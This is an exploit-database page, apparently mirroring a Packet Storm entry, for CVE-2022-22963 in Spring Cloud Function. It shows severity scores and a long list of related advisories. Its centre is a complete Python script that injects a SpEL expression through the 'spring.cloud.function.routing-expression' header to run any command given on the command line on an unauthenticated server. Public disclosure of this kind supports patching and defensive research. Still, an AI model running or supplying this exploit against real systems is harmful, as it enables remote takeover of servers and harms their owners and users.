Lucene search
GatoGamer1155, 0bfxgh0stPACKETSTORM:173430HistoryJul 12, 2023 - 12:00 a.m.
Spring Cloud 3.2.2 Remote Command Execution
2023-07-1200:00:00
GatoGamer1155, 0bfxgh0st
packetstormsecurity.com
175
exploit
rce
command execution
spring cloud
cve-2022-22963
security vulnerability
remote attack
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
`# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)
# Date: 07/07/2023
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://spring.io/projects/spring-cloud-function/
# Description: Exploit to execute commands exploiting CVE-2022-22963
# Software Link: https://spring.io/projects/spring-cloud-function
# CVE: CVE-2022-22963
import requests, argparse, json
parser = argparse.ArgumentParser()
parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)
parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)
args = parser.parse_args()
print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")
headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command }
data = {"data": ""}
request = requests.post(args.url, data=data, headers=headers)
response = json.dumps(json.loads(request.text), indent=2)
print(response)
`
Related
osv
osv
CVE-2022-22963
2022-04-01 23:15:13
redhat
redhat
(RHSA-2022:1291) Low: Release of OpenShift Serverless Client kn 1.21.1
2022-04-11 07:34:16
(RHSA-2022:1292) Low: Release of OpenShift Serverless 1.21.1
2022-04-11 08:22:04
(RHSA-2022:4880) Moderate: ACS 3.70 enhancement and security update
2022-06-02 02:02:58
zdt
zdt
Spring Cloud Function SpEL Injection Exploit
2022-03-31 00:00:00
Spring Cloud 3.2.2 - Remote Command Execution Exploit
2023-07-11 00:00:00
githubexploit
githubexploit
Exploit for Expression Language Injection in Vmware Spring Cloud Function
2023-01-15 21:39:20
Exploit for Expression Language Injection in Vmware Spring Cloud Function
2023-03-13 13:28:55
Exploit for Expression Language Injection in Vmware Spring Cloud Function
2023-12-28 06:58:17
prion
prion
Remote code execution
2022-04-01 23:15:00
ibm
ibm
wallarmlab
wallarmlab
Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)
2022-03-31 01:49:02
github
github
saint
saint
Spring Cloud Function Remote Code Execution
2022-04-05 00:00:00
Spring Cloud Function Remote Code Execution
2022-04-05 00:00:00
checkpoint_advisories
checkpoint_advisories
Spring Cloud Function Remote Code Execution (CVE-2022-22963)
2022-03-31 00:00:00
nessus
nessus
metasploit
metasploit
Spring Cloud Function SpEL Injection
2022-03-30 22:38:41
cisa_kev
cisa_kev
VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability
2022-08-25 00:00:00
wizblog
wizblog
kitploit
kitploit
nuclei
nuclei
Spring Cloud - Remote Code Execution
2022-03-27 14:47:28
attackerkb
attackerkb
CVE-2022-22963
2022-04-01 00:00:00
CVE-2021-38406
2021-09-09 00:00:00
veracode
veracode
Remote Code Execution
2022-03-31 01:51:42
cvelist
cvelist
CVE-2022-22963
2022-04-01 00:00:00
akamaiblog
akamaiblog
Spring Cloud Function SpEL Injection (CVE-2022-22963) Exploited in the Wild
2022-03-31 19:30:00
redhatcve
redhatcve
CVE-2022-22963
2022-03-31 18:32:29
packetstorm
packetstorm
Spring Cloud Function SpEL Injection
2022-03-31 00:00:00
spring
spring
CVE report published for Spring Cloud Function
2022-03-30 00:53:00
openvas
openvas
cisco
cisco
cve
cve
CVE-2022-22963
2022-04-01 23:15:00
rapid7blog
rapid7blog
Update on Spring4Shellβs Impact on Rapid7 Solutions and Systems
2022-04-01 14:42:42
Metasploit Weekly Wrap-Up
2022-04-01 18:34:29
Whatβs New in InsightVM and Nexpose: Q2 2022 in Review
2022-07-28 14:00:00
exploitdb
exploitdb
Spring Cloud 3.2.2 - Remote Command Execution (RCE)
2023-07-11 00:00:00
fortinet
fortinet
CVE-2022-22965 and CVE-2022-22963 vulnerabilities
2022-04-01 00:00:00
qualysblog
qualysblog
Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability
2022-03-31 09:00:00
Identify Server-Side Attacks Using Qualys Periscope
2022-12-01 23:11:35
paloalto
paloalto
thn
thn
cisa
cisa
threatpost
threatpost
RCE Bug in Spring Cloud Could Be the Next Log4Shell, Researchers Warn
2022-03-30 18:04:11
f5
f5
cert
cert
securelist
securelist
Spring4Shell (CVE-2022-22965): details and mitigations
2022-04-04 15:30:36
avleonov
avleonov
mmpc
mmpc
mssecure
mssecure
impervablog
impervablog
Imperva Protects from New Spring Framework Zero-Day Vulnerabilities
2022-03-31 15:20:03
malwarebytes
malwarebytes
4 over-hyped security vulnerabilities of 2022
2022-12-19 01:00:00
trellix
trellix
The Bug Report β April 2022 Edition
2022-05-04 00:00:00
The Bug Report β April 2022 Edition
2022-05-04 00:00:00
checkpoint_security
checkpoint_security
ics
ics
2022 Top Routinely Exploited Vulnerabilities
2023-08-03 12:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2022
2022-07-19 00:00:00
Oracle Critical Patch Update Advisory - April 2022
2022-04-19 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Related for PACKETSTORM:173430